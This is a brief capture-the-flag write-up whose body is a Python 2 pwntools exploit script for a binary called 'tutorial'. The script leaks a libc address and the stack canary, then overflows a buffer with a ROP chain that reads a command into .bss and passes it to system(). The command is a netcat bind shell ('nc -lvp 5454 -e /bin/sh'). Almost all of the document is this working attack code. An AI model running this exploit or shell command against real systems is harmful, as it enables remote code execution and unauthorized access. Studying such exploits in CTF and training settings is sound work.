The challenge imposes many constraints, so you have to locate each condition in IDA and satisfy it before the binary will run normally.


```python
# Exploit script for the "tutorial" binary (Python 2 pwntools: payloads are str).
from pwn import *

r = remote("localhost", 9797)
libc_elf = ELF("./libc-2.19.so")
elf = ELF("./tutorial")

read_plt = elf.plt['read']
read_got = elf.got['read']
write_plt = elf.plt['write']
write_got = elf.got['write']
bss = elf.bss()
cmd = "nc -lvp 5454 -e /bin/sh\x00"

# Menu 1 prints a libc address; puts and system are derived from it
r.sendlineafter(">", "1")
r.recvuntil("Reference:")

libc_puts = int(r.recv(14), 16) + 1280
libc_system = libc_puts - 0x2a300
log.info("libc_puts = {}".format(hex(libc_puts)))
log.info("libc_system = {}".format(hex(libc_system)))

# ROP gadgets, expressed as offsets from the leaked puts address
pop_rdi = libc_puts + 0x12e515
pop_rsi = libc_puts + 0xcd587
pop_rdx = libc_puts - 0x6dafe

# Menu 2: fill the buffer up to the canary so the echo leaks it
r.sendlineafter(">", "2")

payload = "A"*311
r.sendlineafter("Time to test your exploit...", payload)

r.recvuntil("A\x0a")
canary = u64(r.recv(8))
log.info("canary = {}".format(hex(canary)))

# Menu 2 again: keep the canary intact and overwrite the return address
print r.sendlineafter(">", "2")
payload = "\x90"*312
payload += p64(canary)
payload += "\x90"*8          # saved rbp

# read(4, bss, 30): read the command string into .bss (fd 4 is presumably the client socket)
payload += p64(pop_rdi)
payload += p64(4)
payload += p64(pop_rsi)
payload += p64(bss)
payload += p64(pop_rdx)
payload += p64(30)
payload += p64(read_plt)

# system(bss)
payload += p64(pop_rdi)
payload += p64(bss)
payload += p64(libc_system)
pause()
r.sendlineafter(">", payload)
pause()
r.sendline(cmd)
```


